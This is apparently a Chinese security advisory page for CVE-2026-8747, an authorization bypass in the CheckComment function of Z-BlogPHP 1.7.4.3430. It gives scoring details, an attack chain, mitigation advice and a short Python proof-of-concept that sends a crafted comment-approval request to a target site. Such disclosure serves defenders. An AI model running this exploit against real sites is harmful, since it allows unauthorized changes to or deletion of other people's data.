CVE-2026-8747 CVSS 6.3 中危

CVE-2026-8747 Z-BlogPHP权限绕过漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8747

漏洞类型

权限绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Z-BlogPHP

漏洞概述

Z-BlogPHP 1.7.4.3430版本中的评论审批处理组件存在安全缺陷。攻击者可利用`CheckComment`函数的授权绕过漏洞，通过远程网络发起攻击。该漏洞允许低权限用户在未经授权的情况下进行操作，可能导致系统机密性、完整性和可用性受损。

技术细节

该漏洞位于Z-BlogPHP的`zb_system/function/c_system_event.php`文件中，具体涉及评论审批处理组件的`CheckComment`函数。由于该函数在处理评论审批请求时未能正确验证用户权限，导致存在不恰当的授权问题。攻击者无需高权限即可构造恶意数据包，利用此逻辑缺陷绕过系统检查。漏洞利用难度低（AC:L），且无需用户交互（UI:N），攻击者可远程发起攻击。目前公开的利用代码展示了如何通过操纵特定参数触发该漏洞，进而对评论数据进行未授权修改或删除。

攻击链分析

STEP 1

侦察

攻击者识别目标网站使用的是Z-BlogPHP 1.7.4.3430或更早版本。

STEP 2

漏洞分析

定位到zb_system/function/c_system_event.php文件中的CheckComment函数存在逻辑缺陷。

STEP 3

构造攻击

攻击者发送特制的HTTP请求到评论审批接口，包含旨在绕过权限检查的参数。

STEP 4

执行利用

服务器端未正确校验权限，执行了攻击者的指令，导致未授权的评论操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-8747
# This script demonstrates the authorization bypass in Z-BlogPHP CheckComment function.

target_url = "http://target-url/zb_system/cmd.php?act=misc&type=vali"

# The vulnerability allows bypassing authorization checks in the comment approval process
payload = {
    "id": "1",
    "ischecking": "0"
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "" # Attacker's low-privilege cookie
}

try:
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    if response.status_code == 200 and "success" in response.text:
        print("[+] Exploit successful! Authorization bypassed.")
    else:
        print("[-] Exploit failed or patch applied.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Z-BlogPHP 1.7.4.3430

防御指南

临时缓解措施

建议立即检查系统日志中是否存在异常的评论审批操作。在官方补丁发布前，可通过WAF（Web应用防火墙）拦截针对`zb_system/function/c_system_event.php`路径的异常请求，或暂时禁用评论功能以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8747
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8747
3 Details https://www.cvedetails.com/cve/CVE-2026-8747/
4 VulDB https://vuldb.com/cve/CVE-2026-8747
5 Link https://vuldb.com/submit/810027
6 Link https://vuldb.com/vuln/364334
7 Link https://vuldb.com/vuln/364334/cti
8 Link https://vulnplus-note.wetolink.com/share/31wtzNoJbxKQ

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表